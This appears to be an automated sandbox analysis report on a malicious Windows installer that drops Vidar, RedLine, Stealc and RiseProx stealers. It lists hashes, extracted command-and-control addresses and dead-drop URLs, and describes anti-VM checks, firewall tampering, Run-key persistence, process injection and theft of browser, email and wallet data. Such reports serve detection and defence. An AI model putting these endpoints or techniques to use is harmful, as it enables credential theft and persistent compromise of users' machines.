Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
01-05-2024 18:35
Behavioral task
behavioral1
Sample
1714588385.7011812_setup.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
1714588385.7011812_setup.exe
Resource
win11-20240426-en
General
-
Target
1714588385.7011812_setup.exe
-
Size
2.5MB
-
MD5
6bd1b5e6664b5cef6bc29d6215eb5eed
-
SHA1
56d094f696e070729f95e1d5d31c3c29f82f0a68
-
SHA256
df2f9be4da5739c5b409ceaf5bf7a7be7a3bc0020328c7ea1c22fe4b3a6d68e2
-
SHA512
3193dec08f9936a2c483b42ac42d9e57ca40dd64d1ea53d487c6ac4917003fe6efa96fc0068c30a1466b1b6a3ae8c6fd917c801d3d4c09a79fad890704c39342
-
SSDEEP
49152:3pPI++rXvuXiXLc4NohtwN7kyqK13jmBTyK0ov7su0C4:3pHWvj7u2GyrVumK0ol4
Malware Config
Extracted
stealc
Extracted
vidar
9.3
03cea2609023d13f145ac6c5dc897112
https://steamcommunity.com/profiles/76561199680449169
https://t.me/r1g1o
-
profile_id_v2
03cea2609023d13f145ac6c5dc897112
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.96:28380
Extracted
risepro
193.233.132.253:50500
193.233.132.226:50500
147.45.47.93:58709
Signatures
-
Detect Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2060-233-0x0000000000400000-0x0000000000643000-memory.dmp family_vidar_v7 behavioral2/memory/2060-231-0x0000000000400000-0x0000000000643000-memory.dmp family_vidar_v7 behavioral2/memory/2060-230-0x0000000000400000-0x0000000000643000-memory.dmp family_vidar_v7 -
Detect ZGRat V1 1 IoCs
Processes:
resource yara_rule behavioral2/memory/696-670-0x0000000000400000-0x0000000000490000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 2 IoCs
Processes:
1714588385.7011812_setup.exeBkPeq6sStPIJt6eQzR9iKjCJ.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 1714588385.7011812_setup.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" BkPeq6sStPIJt6eQzR9iKjCJ.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3452-238-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral2/memory/1672-384-0x0000000000220000-0x000000000029E953-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
sJfF7bgkUqNIFOBVdgKnJ3Rj.exe1714588385.7011812_setup.exeBkPeq6sStPIJt6eQzR9iKjCJ.exenW4waGBVRtQJr0IGyv9rf_uR.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sJfF7bgkUqNIFOBVdgKnJ3Rj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1714588385.7011812_setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BkPeq6sStPIJt6eQzR9iKjCJ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nW4waGBVRtQJr0IGyv9rf_uR.exe -
Blocklisted process makes network request 4 IoCs
Processes:
RegAsm.exerundll32.exeflow pid process 92 2060 RegAsm.exe 95 2060 RegAsm.exe 96 2060 RegAsm.exe 149 3500 rundll32.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 424 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
1714588385.7011812_setup.exeBkPeq6sStPIJt6eQzR9iKjCJ.exenW4waGBVRtQJr0IGyv9rf_uR.exesJfF7bgkUqNIFOBVdgKnJ3Rj.exeInstall.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1714588385.7011812_setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BkPeq6sStPIJt6eQzR9iKjCJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nW4waGBVRtQJr0IGyv9rf_uR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sJfF7bgkUqNIFOBVdgKnJ3Rj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1714588385.7011812_setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BkPeq6sStPIJt6eQzR9iKjCJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nW4waGBVRtQJr0IGyv9rf_uR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sJfF7bgkUqNIFOBVdgKnJ3Rj.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
SQNfYWE.exevrXeRMO.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Control Panel\International\Geo\Nation SQNfYWE.exe Key value queried \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Control Panel\International\Geo\Nation vrXeRMO.exe -
Executes dropped EXE 26 IoCs
Processes:
H06PndcrWiIaVx5PSdNTfHA2.exenW4waGBVRtQJr0IGyv9rf_uR.exe21TYPfMnkkSbr5d7azCiFo2v.exexMZwwEzPK44PSgfAXefyTRer.exeBTgSRN4g3JmlVuYdJeoWlWRy.exerN5PhBPG1JLMbW1HxIHs3JRl.exeypy5d_A5K61R6kYnPCE2aQ44.exeO9DHgLkl0NUvjFCrxs7X4Nwz.exe_nmI4eGVgzjJ4g_Ia4tRhBBX.exeir75MsIvsiG7rQAfaFb5x56i.exesJfF7bgkUqNIFOBVdgKnJ3Rj.exeBkPeq6sStPIJt6eQzR9iKjCJ.exeUiDDocf0sy_A_v4KXEF0FUfY.exexMZwwEzPK44PSgfAXefyTRer.tmpsoftjenimmp3converter.exesoftjenimmp3converter.exeInstall.exeInstall.exeInstall.exedckuybanmlgp.exeoDZex1P_CrS6FyhU7GWe.exeSQNfYWE.exeInstall.exevrXeRMO.exeH06PndcrWiIaVx5PSdNTfHA2.execsrss.exepid process 5100 H06PndcrWiIaVx5PSdNTfHA2.exe 2956 nW4waGBVRtQJr0IGyv9rf_uR.exe 1160 21TYPfMnkkSbr5d7azCiFo2v.exe 2144 xMZwwEzPK44PSgfAXefyTRer.exe 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe 2344 ypy5d_A5K61R6kYnPCE2aQ44.exe 2704 O9DHgLkl0NUvjFCrxs7X4Nwz.exe 4508 _nmI4eGVgzjJ4g_Ia4tRhBBX.exe 3544 ir75MsIvsiG7rQAfaFb5x56i.exe 424 sJfF7bgkUqNIFOBVdgKnJ3Rj.exe 4608 BkPeq6sStPIJt6eQzR9iKjCJ.exe 4916 UiDDocf0sy_A_v4KXEF0FUfY.exe 1456 xMZwwEzPK44PSgfAXefyTRer.tmp 2476 softjenimmp3converter.exe 3972 softjenimmp3converter.exe 4756 Install.exe 2564 Install.exe 6056 Install.exe 3744 dckuybanmlgp.exe 3964 oDZex1P_CrS6FyhU7GWe.exe 2868 SQNfYWE.exe 5280 Install.exe 4920 vrXeRMO.exe 5480 H06PndcrWiIaVx5PSdNTfHA2.exe 2992 csrss.exe -
Loads dropped DLL 7 IoCs
Processes:
xMZwwEzPK44PSgfAXefyTRer.tmp_nmI4eGVgzjJ4g_Ia4tRhBBX.exerundll32.exeir75MsIvsiG7rQAfaFb5x56i.exepid process 1456 xMZwwEzPK44PSgfAXefyTRer.tmp 1456 xMZwwEzPK44PSgfAXefyTRer.tmp 1456 xMZwwEzPK44PSgfAXefyTRer.tmp 4508 _nmI4eGVgzjJ4g_Ia4tRhBBX.exe 3500 rundll32.exe 3544 ir75MsIvsiG7rQAfaFb5x56i.exe 3544 ir75MsIvsiG7rQAfaFb5x56i.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/2964-0-0x0000000140000000-0x0000000140889000-memory.dmp themida behavioral2/memory/2964-68-0x0000000140000000-0x0000000140889000-memory.dmp themida behavioral2/memory/2964-98-0x0000000140000000-0x0000000140889000-memory.dmp themida behavioral2/memory/2964-150-0x0000000140000000-0x0000000140889000-memory.dmp themida behavioral2/memory/2964-167-0x0000000140000000-0x0000000140889000-memory.dmp themida C:\Users\Admin\Documents\SimpleAdobe\BkPeq6sStPIJt6eQzR9iKjCJ.exe themida behavioral2/memory/4608-267-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-315-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-314-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-306-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-265-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-266-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-264-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-307-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/2964-348-0x0000000140000000-0x0000000140889000-memory.dmp themida behavioral2/memory/4608-458-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-514-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida behavioral2/memory/4608-882-0x0000000000A30000-0x0000000000FFB000-memory.dmp themida -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
sJfF7bgkUqNIFOBVdgKnJ3Rj.exeO9DHgLkl0NUvjFCrxs7X4Nwz.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sJfF7bgkUqNIFOBVdgKnJ3Rj.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sJfF7bgkUqNIFOBVdgKnJ3Rj.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sJfF7bgkUqNIFOBVdgKnJ3Rj.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 O9DHgLkl0NUvjFCrxs7X4Nwz.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 O9DHgLkl0NUvjFCrxs7X4Nwz.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 O9DHgLkl0NUvjFCrxs7X4Nwz.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
O9DHgLkl0NUvjFCrxs7X4Nwz.exesJfF7bgkUqNIFOBVdgKnJ3Rj.exeH06PndcrWiIaVx5PSdNTfHA2.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" O9DHgLkl0NUvjFCrxs7X4Nwz.exe Set value (str) \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\\AdobeUpdaterV202.exe" sJfF7bgkUqNIFOBVdgKnJ3Rj.exe Set value (str) \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" H06PndcrWiIaVx5PSdNTfHA2.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
1714588385.7011812_setup.exeBkPeq6sStPIJt6eQzR9iKjCJ.exenW4waGBVRtQJr0IGyv9rf_uR.exesJfF7bgkUqNIFOBVdgKnJ3Rj.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1714588385.7011812_setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BkPeq6sStPIJt6eQzR9iKjCJ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nW4waGBVRtQJr0IGyv9rf_uR.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sJfF7bgkUqNIFOBVdgKnJ3Rj.exe -
Drops Chrome extension 4 IoCs
Processes:
BkPeq6sStPIJt6eQzR9iKjCJ.exeSQNfYWE.exevrXeRMO.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjopndebegpndbilmgkbmnchgfdkkicg\1.0.2_0\manifest.json BkPeq6sStPIJt6eQzR9iKjCJ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json SQNfYWE.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json SQNfYWE.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json vrXeRMO.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 5 api.myip.com 110 ipinfo.io 112 ipinfo.io 4 api.myip.com 4 ipinfo.io 7 ipinfo.io 10 ipinfo.io 84 api.myip.com 85 ipinfo.io -
Drops file in System32 directory 47 IoCs
Processes:
BkPeq6sStPIJt6eQzR9iKjCJ.exeSQNfYWE.exepowershell.exepowershell.exe1714588385.7011812_setup.exevrXeRMO.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI BkPeq6sStPIJt6eQzR9iKjCJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini BkPeq6sStPIJt6eQzR9iKjCJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy 1714588385.7011812_setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE SQNfYWE.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vrXeRMO.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 1714588385.7011812_setup.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content SQNfYWE.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 SQNfYWE.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol BkPeq6sStPIJt6eQzR9iKjCJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 1714588385.7011812_setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 1714588385.7011812_setup.exe File opened for modification C:\Windows\System32\GroupPolicy BkPeq6sStPIJt6eQzR9iKjCJ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F SQNfYWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
1714588385.7011812_setup.exeBkPeq6sStPIJt6eQzR9iKjCJ.exeO9DHgLkl0NUvjFCrxs7X4Nwz.exenW4waGBVRtQJr0IGyv9rf_uR.exesJfF7bgkUqNIFOBVdgKnJ3Rj.exepid process 2964 1714588385.7011812_setup.exe 4608 BkPeq6sStPIJt6eQzR9iKjCJ.exe 2704 O9DHgLkl0NUvjFCrxs7X4Nwz.exe 2956 nW4waGBVRtQJr0IGyv9rf_uR.exe 424 sJfF7bgkUqNIFOBVdgKnJ3Rj.exe 2704 O9DHgLkl0NUvjFCrxs7X4Nwz.exe 2704 O9DHgLkl0NUvjFCrxs7X4Nwz.exe 2704 O9DHgLkl0NUvjFCrxs7X4Nwz.exe 2704 O9DHgLkl0NUvjFCrxs7X4Nwz.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
rN5PhBPG1JLMbW1HxIHs3JRl.exeBTgSRN4g3JmlVuYdJeoWlWRy.exedckuybanmlgp.exe_nmI4eGVgzjJ4g_Ia4tRhBBX.exeoDZex1P_CrS6FyhU7GWe.exedescription pid process target process PID 1672 set thread context of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 4784 set thread context of 2060 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 3744 set thread context of 4288 3744 dckuybanmlgp.exe conhost.exe PID 3744 set thread context of 3840 3744 dckuybanmlgp.exe svchost.exe PID 4508 set thread context of 696 4508 _nmI4eGVgzjJ4g_Ia4tRhBBX.exe MsBuild.exe PID 3964 set thread context of 1436 3964 oDZex1P_CrS6FyhU7GWe.exe RegAsm.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
H06PndcrWiIaVx5PSdNTfHA2.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN H06PndcrWiIaVx5PSdNTfHA2.exe -
Drops file in Program Files directory 25 IoCs
Processes:
SQNfYWE.exevrXeRMO.exedescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SQNfYWE.exe File created C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\NVMuxOh.dll SQNfYWE.exe File created C:\Program Files (x86)\VsVHNYITDnqCC\XcyHeXw.dll SQNfYWE.exe File created C:\Program Files (x86)\lwqGFNNkU\VUNWnxw.xml vrXeRMO.exe File created C:\Program Files (x86)\ooaqkSSxqGyU2\lqYRaAl.xml vrXeRMO.exe File created C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\IEzZfJC.dll vrXeRMO.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi vrXeRMO.exe File created C:\Program Files (x86)\ooaqkSSxqGyU2\oaJMOYlqRkiOm.dll vrXeRMO.exe File created C:\Program Files (x86)\ooaqkSSxqGyU2\sFazCgHPAyOWm.dll SQNfYWE.exe File created C:\Program Files (x86)\VsVHNYITDnqCC\FiTHmnP.xml SQNfYWE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi vrXeRMO.exe File created C:\Program Files (x86)\VsVHNYITDnqCC\zpJgVdg.dll vrXeRMO.exe File created C:\Program Files (x86)\lwqGFNNkU\nTYAyEh.xml SQNfYWE.exe File created C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\FxxkLyy.xml SQNfYWE.exe File created C:\Program Files (x86)\beIflBxZQdcSoxIZQvR\BTqpHvL.xml vrXeRMO.exe File created C:\Program Files (x86)\YhQqVpMUuwUn\kXHikPB.dll vrXeRMO.exe File created C:\Program Files (x86)\VsVHNYITDnqCC\rtOzGtp.xml vrXeRMO.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi SQNfYWE.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SQNfYWE.exe File created C:\Program Files (x86)\YhQqVpMUuwUn\OgMdofg.dll SQNfYWE.exe File created C:\Program Files (x86)\lwqGFNNkU\FzgPyW.dll SQNfYWE.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi SQNfYWE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja SQNfYWE.exe File created C:\Program Files (x86)\ooaqkSSxqGyU2\LjJmSjx.xml SQNfYWE.exe File created C:\Program Files (x86)\lwqGFNNkU\aMYqkO.dll vrXeRMO.exe -
Drops file in Windows directory 8 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeH06PndcrWiIaVx5PSdNTfHA2.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\hiXTHRxmBfdbKAP.job schtasks.exe File opened for modification C:\Windows\Tasks\ltbOwrqBWDKUbrYld.job schtasks.exe File created C:\Windows\Tasks\jAFDOjCXGMQClUYnP.job schtasks.exe File created C:\Windows\Tasks\hiXTHRxmBfdbKAP.job schtasks.exe File opened for modification C:\Windows\rss H06PndcrWiIaVx5PSdNTfHA2.exe File created C:\Windows\rss\csrss.exe H06PndcrWiIaVx5PSdNTfHA2.exe File created C:\Windows\Tasks\bhpuaaonuqVoelUvgo.job schtasks.exe File created C:\Windows\Tasks\ltbOwrqBWDKUbrYld.job schtasks.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 5724 sc.exe 5600 sc.exe 5552 sc.exe 5848 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5012 1672 WerFault.exe rN5PhBPG1JLMbW1HxIHs3JRl.exe 5152 2060 WerFault.exe RegAsm.exe 1804 2704 WerFault.exe O9DHgLkl0NUvjFCrxs7X4Nwz.exe 4848 3544 WerFault.exe ir75MsIvsiG7rQAfaFb5x56i.exe -
Checks processor information in registry 2 TTPs 6 IoCs
